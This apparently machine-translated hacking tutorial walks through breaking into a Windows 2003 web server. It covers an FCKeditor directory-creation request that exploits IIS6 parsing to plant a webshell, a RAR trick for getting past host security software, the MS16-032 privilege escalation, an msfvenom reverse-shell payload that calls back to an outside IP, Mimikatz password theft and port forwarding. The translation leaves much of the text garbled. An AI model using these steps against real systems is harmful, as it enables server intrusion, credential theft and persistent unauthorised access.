This article I signed the writer--cool Prince Handsome
First, the use of Getwebshell article
First, the target station to scan, found that the ASP, directly sweep the site background and default database, download and decrypt the login
The following into the background to find FCKeditor, and still iis6.0, you can consider creating an ASP directory to construct the parsing (FCK editor path is changed to other needs Burpsuite grab the packet when you see)
Below we construct an ASP directory, such as:
http://www. xxoo.com /manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp? command=createfolder&type=image¤tfolder=%2fshell.asp&newfoldername=z&uuid=1244789975
Then to the shell.asp directory to upload a JPG image format, and then open with hatchet, and then look at the support ASPX, then we will use the included method to change the ASPX suffix name to. rar, and then create a 111.ASPx, which contains RAR files, in the future to see the process of cloud lock and security All dogs, then, then let's take it slow and slow down.
First, bypass the security dog Yun Yu and add account
Can't see the system information, but according to the site 404 page can be determined to be 2003 server, and then Access C:\Program Files (x86) existence is determined to be 2003 64-bit system, then we say dry, we upload ms16-032 64 bit directly dry, But found upload exe or other format exp will automatically disappear, see the process is not anti-virus ah, yes no antivirus, is the cloud lock has a function defense, then the way to break through the cloud lock upload is to use RAR, first put exp packaging for 64.rar upload, and then we turn over the RAR in which directory, in C \ Program Files (x86), then open dry
Then execute directly is the system permission, and then I use the dry dog artifact to add an account with Tunna rebound 3968 hint is not remote group, I also want to use GETPASSWORD64 catch plaintext password, but a execution on the card dead, can't think of Metasploit
First, the use of Metasploit
First, use Pentestbox to generate a 64-bit payload with the following command
MSFVenom -P windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443-f exe > C:\mata.exe
Why use 443 port, before I test with other ports directly by the wall can not go online, below we execute this Mata under System, on-line
Below we use this command to grab the plaintext password command 1:use Mimikatz command 2:kerberos such as:
Let's do a listen to the following command:
PORTFWD add-l 6655-p 3968-r 127.0.0.1, this command means to forward the target server's remote 3968 to the pentestbox of the public IP 6655 port
Old Iron No problem, thank you for watching my tutorial, thank you very much ~
From Getwebshell to bypassing the security dog Yun Yu to take advantage of Matasploit into the server